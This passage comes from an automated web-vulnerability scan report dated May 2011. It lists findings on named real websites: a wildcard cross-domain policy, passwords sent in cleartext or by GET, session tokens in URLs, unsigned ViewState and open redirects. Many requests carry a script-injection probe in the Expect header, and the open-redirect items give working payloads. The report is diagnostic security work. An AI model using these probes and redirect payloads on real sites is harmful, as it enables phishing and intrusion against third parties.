Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.virginiasports.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:20:46 GMT
Server: Apache
Last-Modified: Thu, 26 Mar 2009 08:16:48 GMT
ETag: "18a-466013cce5c00"
Accept-Ranges: bytes
Content-Length: 394
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
<domain uri="https://*"/>
<domain uri="http://*"/>
...[SNIP]...

9. Cleartext submission of password  previous  next
There are 10 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


9.1. http://beam.to/login.asp  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beam.to
Path:   /login.asp

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /login.asp HTTP/1.1
Host: beam.to
Proxy-Connection: keep-alive
Referer: http://beam.to/start.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCCAQQAQ=DAJIDBLDJFEMMIDDDPIMKNCN

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:15:06 GMT
Connection: close
Content-Type: text/html
Cache-control: private
Content-Length: 3116


<html><head><title>BeamTo</title>
<link href="css.css" rel=styleSheet type="Text/css">
</head>
<body bgcolor="#FFFFFF" text="#000000">
<table border="0" width="910" cellpadding="0" cellspaceing=
...[SNIP]...
</table>

<form action="change.asp" method="GET">
<table border="0" width="750" cellpadding="4" cellspaceing="4" align="center">
...[SNIP]...
<br><input class="textfield" name="PW" type="password" size="35" value=""></td>
...[SNIP]...

9.2. http://www.choicehotels.ca/favicon.ico  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.choicehotels.ca
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.choicehotels.ca
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: JSF/1.2
Content-Type: text/html;charset=UTF-8
Date: Wed, 04 May 2011 03:11:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>

<script
...[SNIP]...
</span><form id="wrapper-header:loginForm" name="wrapper-header:loginForm" method="post" onsubmit="jQuery('.error-float').hide()" action="/404">
           <script>
...[SNIP]...
</label><input id="wrapper-header:loginForm:decorateUserLoginPW:idInputP" type="password" name="wrapper-header:loginForm:decorateUserLoginPW:idInputP" value="" class="text" /></div>
...[SNIP]...

9.3. http://www.homedepotmoving.com/favicon.ico  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.homedepotmoving.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.homedepotmoving.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=id2mh2j0b02hrk55zv4l4hnf; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:13:06 GMT
Content-Length: 47037


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><link href="../App_T
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="404.aspx?404%3bhttp%3a%2f%2fwww.homedepotmoving.com%3a80%2ffavicon.ico" id="aspnetForm">
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEwMDUyNjYzMjgPZBYCZg9kFgICAw9kFggCAw8PZBYCHgdvbmNsaWNrBQ50aGlzLnZhbHVlPScnO2QCBA8PFgIeCEltYWdlVXJsBRwvaW1hZ2VzL3NlYXJjaF9hcnJ
...[SNIP]...
<div class="signinItem">
<input name="ctl00$ucLogin$password" type="password" maxlength="12" id="ctl00_ucLogin_password" class="signinInput" onfocus="passwordFocus('ctl00_ucLogin_password','ctl00_ucLogin_passwordText');" onblur="passwordBlur('ctl00_ucLogin_password','ctl00_ucLogin_passwordText');" style="display:none;" />
<input name="ctl00$ucLogin$passwordText" type="text" value="Password" maxlength="12" id="ctl00_ucLogin_passwordText" class="signinInput" onfocus="passwordFocus('ctl00_ucLogin_
...[SNIP]...

9.4. http://www.idahopower.com/favicon.ico  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.idahopower.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.idahopower.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 16876
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:07:32 GMT
Set-Cookie: TSd4791c=3da448000bf4625f33f8ce6cb5f077a1e13291874ab59a244dc0d104; Path=/
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascr
...[SNIP]...
<!-- Calling Content Begin -->
   
<form name="loginAL" action=" https://testipco.idahopower.com/login/processlogin.cfm" method="post" enctype="application/x-www-form-urlencoded" onsubmit="return validateFormAL();">
<input name="GUIDAL" type="hidden" value="6795C6D4-B308-EA59-1B4848723FCC704C" />
...[SNIP]...
</div>
<input name="passwordAL" id="passwordAL" type="password" class="loginInputField" size="20" autocomplete="off"/>

</td>
...[SNIP]...

9.5. http://www.lol-jokes.com/favicon.ico  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lol-jokes.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lol-jokes.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 02:42:15 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Server: Apache/Nginx/Varnish
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=1e11cc5fdd7922098b1869d2ed387b53; expires=Fri, 27-May-2011 06:15:32 GMT; path=/
Last-Modified: Wed, 20 Oct 2010 09:54:46 GMT
ETag: "79111cf2abb5675b4c433e5f9a3e8460"
Cache-Control: max-age=1
Expires: Wed, 04 May 2011 02:42:16 GMT
Vary: Accept-Encoding
Content-Length: 19390
Accept-Ranges: bytes
Age: 0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<
...[SNIP]...
<div class="content"><form action="user/login?destination=favicon.ico" method="post">
<div>
...[SNIP]...
<br />
<input type="password" class="form-password" maxlength="64" name="edit[pass]" id="edit-pass" size="15" value="" />
</div>
...[SNIP]...

9.6. http://www.radarsync.com/favicon.ico  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.radarsync.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.radarsync.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=iaqxja2wyuqvnyuxl2gxfvry; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:49:03 GMT
Content-Length: 32185


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div class="lb_inner">
<form id="login_form" action="">
<table>
...[SNIP]...
<td>
<input id="login_password" name="login_password" type="password" />
</td>
...[SNIP]...

9.7. http://www.radarsync.com/favicon.ico  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.radarsync.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.radarsync.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=iaqxja2wyuqvnyuxl2gxfvry; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:49:03 GMT
Content-Length: 32185


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div id="register_div">
<form id="register_form" action="javascript:void(0);" method="post">
<table>
...[SNIP]...
<td>
<input id="password" name="password" type="password" value="" />
</td>
...[SNIP]...
<td>
<input id="password_confirm" name="password_confirm" type="password" value="" />
</td>
...[SNIP]...

9.8. http://www.restaurantrow.com/favicon.ico  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.restaurantrow.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.restaurantrow.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 29823
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:32:37 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>Missing Page : RestaurantRow.com</title>
<meta http-equiv="imagetoolbar" conte
...[SNIP]...
<div id="login_Hold"><form method="post" action="/l_redirect.cfm" onsubmit="return validateLogForm(this);">
<input type="hidden" name="ERRORPG" value="404">
...[SNIP]...
</div><input class="inputText" type="Password" name="password" value=""></div>
...[SNIP]...

9.9. http://www.se-t.net/favicon.ico  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.se-t.net
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.se-t.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 00:44:15 GMT
Content-Type: text/html; charset=windows-1251
Connection: keep-alive
Keep-Alive: timeout=5
Set-Cookie: was=true; expires=Wed, 31-Dec-2014 21:00:00 GMT
Content-Length: 7560

<html>
<head>
<title>........ .. .......</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<meta name="keywords" content="....., ......... ...., ......, ....., .......
...[SNIP]...
<td>


<form action='index.php' method='post' name='frm'>
<td>
...[SNIP]...
<input type='text' name='log' STYLE='width:100;background-color:#ffffff'> .....
<input type='password' name='pas' STYLE='width:100;background-color:#ffffff'> ......


<!--
<a href='index.php?pg=2'>
...[SNIP]...

9.10. http://www.superherorelease.com/favicon.ico  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.superherorelease.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.superherorelease.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:37:31 GMT
Content-Length: 19560


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><link type="text/cs
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="/404.aspx?404;http:/www.superherorelease.com:80/favicon.ico" id="aspnetForm">
<div>
...[SNIP]...
<td>
<input name="ctl00$m_masthead$m_loginCompact$m_passwordTB" type="password" maxlength="250" id="ctl00_m_masthead_m_loginCompact_m_passwordTB" class="field" onclick="this.value='';" />
</td>
...[SNIP]...

10. Session token in URL  previous  next
There are 2 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


10.1. http://www.thehealthplan.com/favicon.ico  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.thehealthplan.com
Path:   /favicon.ico

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thehealthplan.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: 0
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2007.11.07T08:52-0500" exp "2007.11.07T12:00-0500" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Set-Cookie: CFID=13104831;domain=.thehealthplan.com;expires=Fri, 26-Apr-2041 04:16:44 GMT;path=/
Set-Cookie: CFTOKEN=27842674;domain=.thehealthplan.com;expires=Fri, 26-Apr-2041 04:16:44 GMT;path=/
Set-Cookie: JSESSIONID=9430fb20c9531d41550077445351f367c726;path=/
Set-Cookie: COOKIESENABLED=true;expires=Thu, 05-May-2011 04:16:44 GMT;path=/
Set-Cookie: TLTSID=18F4EB764C1C16EC8B746AAD40945A04; Path=/; Domain=.thehealthplan.com
Set-Cookie: TLTUID=18F4EB764C1C16EC8B746AAD40945A04; Path=/; Domain=.thehealthplan.com expires=Wed, 04-05-2021 04:16:44 GMT
Date: Wed, 04 May 2011 04:16:44 GMT
Connection: close

           
                                                                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<li><a href="https://geisinger.shcm.lawson.com/prodhcm/CandidateSelfService/controller.servlet?context.session.key.JobBoard=GHP&context.dataarea=prodhcm&context.session.key.HROrganization=1">Careers</a>
...[SNIP]...

10.2. http://www.vc.edu/favicon.ico  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.vc.edu
Path:   /favicon.ico

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vc.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: CFID=1052626;expires=Fri, 26-Apr-2041 03:45:59 GMT;path=/
Set-Cookie: CFTOKEN=295e83118cbb823b-3B26501A-C377-6A35-92E84F921D835DA0;expires=Fri, 26-Apr-2041 03:45:59 GMT;path=/
Set-Cookie: JSESSIONID=843072c7a2b0d97f73f85f532b6672661b7e;path=/
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:45:58 GMT
Content-Length: 36781


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Te
...[SNIP]...
<div align="center" style="margin-top:20px;"><a href="http://nextelonline.nextel.com/NASApp/onlinestore/Action/CustomAisleLanding?token=GzXkcUHU5wTk9EGnYKXTsqAWHck" target="_blank"><img src="/images/sidebar-sprint2.gif" width="243" height="53" alt="Sprint Student Discounts - Click Here" border="0" />
...[SNIP]...

11. Password field submitted using GET method  previous  next
There are 2 instances of this issue:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.


11.1. http://beam.to/login.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://beam.to
Path:   /login.asp

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /login.asp HTTP/1.1
Host: beam.to
Proxy-Connection: keep-alive
Referer: http://beam.to/start.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSCCAQQAQ=DAJIDBLDJFEMMIDDDPIMKNCN

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/4.0
Date: Wed, 04 May 2011 02:15:06 GMT
Connection: close
Content-Type: text/html
Cache-control: private
Content-Length: 3116


<html><head><title>BeamTo</title>
<link href="css.css" rel=styleSheet type="Text/css">
</head>
<body bgcolor="#FFFFFF" text="#000000">
<table border="0" width="910" cellpadding="0" cellspaceing=
...[SNIP]...
</table>

<form action="change.asp" method="GET">
<table border="0" width="750" cellpadding="4" cellspaceing="4" align="center">
...[SNIP]...
<br><input class="textfield" name="PW" type="password" size="35" value=""></td>
...[SNIP]...

11.2. http://www.radarsync.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.radarsync.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.radarsync.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=iaqxja2wyuqvnyuxl2gxfvry; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:49:03 GMT
Content-Length: 32185


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div class="lb_inner">
<form id="login_form" action="">
<table>
...[SNIP]...
<td>
<input id="login_password" name="login_password" type="password" />
</td>
...[SNIP]...

12. ASP.NET ViewState without MAC enabled  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.garnier.com
Path:   /favicon.ico

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.garnier.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Powered-By: 01
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=iso-8859-1
Cache-Control: private, max-age=413854
Date: Wed, 04 May 2011 02:09:14 GMT
Content-Length: 3423
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" value="dDwyMDIyNDgwNzQ7Oz4=" />
...[SNIP]...

13. Open redirection  previous  next
There are 3 instances of this issue:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Remediation background

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:


13.1. http://p.brilig.com/contact/bct [REDIR parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /contact/bct

Issue detail

The value of the REDIR request parameter is used to perform an HTTP redirect. The payload .a26aac04213bfcbdf/ was submitted in the REDIR parameter. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.

Remediation detail

When prepending an absolute prefix to the user-supplied URL, the application should ensure that the prefixed domain name is followed by a slash.

Request

GET /contact/bct?pid=21008FFD-5920-49E9-AC20-F85A35BDDE15&_ct=pixel&puid=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&REDIR=.a26aac04213bfcbdf/&external_user_id=1&_m=1&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_dataprovider_id=27&admeld_callback=http://tag.admeld.com/pixel HTTP/1.1
Host: p.brilig.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_atf?t=1304490531988&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbid=AF3T0ZuAGOk4NdOmwmcHrt8jZvpqOmyTfBnhe9lXkrHzvb6m4hSMri5FOCMElW8Qz5pV2zxkbOa8; BriligContact=85cb651d-def1-4cfa-a1e1-8e977f5422e6

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/plain
Date: Wed, 04 May 2011 01:29:56 GMT
Location: http://.a26aac04213bfcbdf/&external_user_id=1&_m=1&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_dataprovider_id=27&admeld_callback=http://tag.admeld.com/pixel
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Server: Apache/2.2.16 (Ubuntu)
Set-Cookie: BriligContact=85cb651d-def1-4cfa-a1e1-8e977f5422e6; Version=1; Domain=".brilig.com "; Max-Age=946080000; Expires=Fri, 26-Apr-2041 01:29:56 GMT
X-Brilig-D: D=2466
Content-Length: 0
Connection: keep-alive


13.2. http://server.iad.liveperson.net/hc/15614964/ [imageUrl parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/15614964/

Issue detail

The value of the imageUrl request parameter is used to perform an HTTP redirect. The payload http%3a//a3b283a6de1104522/a%3fhttp%3a//www.hertzfurniture.com/images/live_person was submitted in the imageUrl parameter. This caused a redirection to the following URL:

Request

GET /hc/15614964/?cmd=repstate&site=15614964&channel=web&&ver=1&imageUrl=http%3a//a3b283a6de1104522/a%3fhttp%3a//www.hertzfurniture.com/images/live_person HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16601209214853,d=1303177644; HumanClickACTIVE=1304455118670

Response

HTTP/1.1 302 Moved Temporarily
Date: Wed, 04 May 2011 01:15:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Location: http://a3b283a6de1104522/a?http://www.hertzfurniture.com/images/live_person/repoffline.gif&d=1304471731272
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 0


